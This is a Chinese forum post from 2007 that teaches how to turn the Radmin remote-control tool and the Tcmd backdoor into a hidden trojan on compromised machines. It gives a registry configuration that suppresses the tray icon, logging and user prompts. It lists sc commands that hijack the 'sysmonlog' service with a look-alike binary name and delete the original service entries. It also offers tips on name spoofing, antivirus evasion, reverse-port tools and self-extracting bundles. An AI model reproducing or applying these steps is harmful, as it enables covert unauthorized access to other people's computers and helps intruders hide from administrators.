首先说说Radmin,Radmin真是个好东西,我也是最近才发现这个东西的好处,譬如不被杀,管理很方便,速度也很快,配置简单……反正我是看到很多管理员就是选用的这个。尽管是个好东西,缺点还是有的,譬如那个服务名就很显眼,进程里的那个R_server.exe更是被人见到就杀,现在一个最菜的管理员也知道用任务管理器去查杀进程,配置的时候如果出错也很容易被发现,他的那个图标也很有个性,有个性就容易被发现,还有就是有人抱怨那个服务名总是R_server在服务管理器里很是显眼……但是,本着我对Radmin的热爱,还是要把这个好东西从管理员的眼皮底下挽救回来,改造成属于自己的终极木马,至于如何挽救这个好马那就跟我来看看吧!
首先说说配置,然后是隐藏。配置我想不用多说,以前黑x有文章已经说得很清楚了,网管想看到的东西你不要让他看到就可以了。我们知道Radmin只需要R_Server.exe,AdmDll.dll和raddrv.dll这三个文件就可以安装,所以你首先要将这几个文件传到对方机器上,嫌麻烦的话后面有好的办法。至于Radmin的配置,可以先在自己的机器上配置好然后导出[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]下的内容,传到别人机器上导入,Radmin就跟你机器上配置的一样了,因为Radmin服务依赖的东西都在这个项下面。注意的几个是不要任务栏显示,不要日志记录,然后修改自己的密码什么的基本就可以了。我配置的如下:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:fc,e2,fe,2b,e9,24,fd,11,67,bd,be,3b,5c,e1,ac,8b
"Port"=hex:8b,05,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
这样配置的密码是jnc,端口是1419,不要急,具体的注册表文件config.reg已经带在后面了,想修改自己的密码和端口的话可以从自己机器上找到相应的注册表键值替换就OK了。但是注意,Radmin是从这个键值下读取相应的参数,所以每次用rededit -s导入注册表的时候,要先停服务然后启动服务才有效的。什么,你不知道怎么安装radmin,自己看以前的文章去!好了,配置就说这么多,这样配置的尽管不会被普通的用户发现,但是上面的几个缺点也都出来了,稍微有一点经验的管理员就很可以发现。
关于服务隐藏以前魔女的条件也说过,但是不是很行得通,她是想把系统的剪贴薄删掉,然后把自己的Radmin伪装成剪贴薄,看起来是很好,可是事实上呢?我不说删除clipsrv.exe时系统弹出来的那个文件保护对话框没有办法解决,如图一。还有就是你的服务显示名称可以伪装,但是服务名还是R_server,这个没有办法变的,很容易被识破。我们可以不删除服务然后替换而是直接将系统的服务的本质改成我们的,但是让其他的譬如服务名等都不做任何变化,不了解内幕的人是很难看出来的。下面我们就将Radmin隐藏到系统的服务里面,我们将他的可执行文件路径改了就行了的。不只是Radmin,其他的后门如木马,还有Tcmd等他们本身默认安装的隐蔽性并不是很好,但是可以通过类似的方法来改造。首先是选我们要代替哪个服务,这里我推荐用那些不依赖其他任何服务就能自己启动的服务,否则会出现不能顺利启动的情况,当然也不能被其他人所依赖了,人家系统挂了就完了:)。那些用svchost.exe的就不要看了,呵呵。这里我推荐sysmonlog服务,就是那个"配置性能日志和警报"服务,符合我们的条件并且还不会被一般的管理员所注意,看看我如何做的吧。假设我们已经安装了Radmin,注册表文件已经导入,现在的Radmin的程序名字还是R_server.exe,在系统目录下。我们停掉Radmin服务后先把他的名字改成sm1ogsvc.exe。为什么改成这个?呵呵,不觉得1和l很像么?好了,改名之后我们可以来替换了。Sc这个工具知道吧,用以下的命令:
sc config sysmonlog start= auto \\将"配置性能日志和警报"服务设置成自启动,没有什么疑点吧?\\
sc config sysmonlog binpath= "c:\winnt\system32\sm1ogsvc.exe /service" \\修改其二进制路径,其实就是我们伪装的Radmin\\
net start sysmonlog \\启动服务,Radmin又开始工作啦\\
sc delete r_server \\删掉我们开始的Radmin服务,让Radmin在别人眼里完全消失\\
这样就完成替换了,现在看看吧,怎么样?net stop r_server,没有这个服务了吧,哈哈!但是我们的端口还是在监听哦!连接看看,还可以连接上的哦!
修改到这里,我们的Radmin算是真正在系统里扎下根了,很难被发现了。还有一个我比较喜欢的命令行下的工具是Tcmd,大概大家都知道,就是可以监听指定端口,等我们连接的时候可以得到一个cmdshell。这个东西简单易用,体积还特别小,但是缺点比Radmin还显而易见,那个"
Windows[/url]
Kernel Service"一看就是做木马的,而且服务描述里是空,进程的名字也很显眼,熟悉一点的人就会发现。对于这样的不是很完善的木马,我们不会编程,但是还是可以用很简单的办法来让他变得隐藏并且来为我们服务的。我们在肉鸡的cmdshell下安装tcmd,具体的帮助请看tcmd /?
tcmd -install 1418 jnc
好了,服务安装完之后他需要的一些参数什么的信息就存到注册表里了,我们看到服务管理器里多了个
Windows[/url]
Kernel Service,缺点就是刚才提到的隐藏不够好。现在我们按照刚才的思路,Sc删除后他的信息还可以继续为我们工作哦!还是替换"配置性能日志和警报"服务,改他的可执行文件路径就OK了。我的操作如下:
sc config sysmonlog start= auto
sc config sysmonlog binpath= "c:\winnt\system32\sm1ogsvc.exe"
net start sysmonlog
sc delete "
Windows[/url]
Kernel Service"
自己理解一下这些是做什么的吧!看看,已经很隐蔽了吧!这可是我们的自己的Tcmd哦,看看成果吧!如图二。想办法让他躲过杀毒软件的查杀,嘿嘿……!
这里只是谈了这两个的修改,其实还有很多其他的,譬如一些木马的隐藏不高的话,你都可以这样修改的。还有就是自己对木马的完善,我就不说了,譬如名字的技巧,我这里用的是1和l,你还可以用0和O等来混淆别人的眼睛,如果对付只会用任务管理器的人,你可以改成svchost.exe放到system等目录下,这样他们就没有办法了。还有就是程序的图标,不够隐蔽的话可以自己去修改的。还有个人认为比较好的就是把木马的配置和Winrar一起来做成自己的木马,过程我就不讲了,以前的黑X有好多介绍了。还有最近不是有个反弹端口的工具么,完全可以加在里面把端口反弹出来,因为网上已经有人这么做出来了,我就不写了,自己想一下做成自解压的EXE文件就可以了。 |
发表于 2007-9-8 06:37:38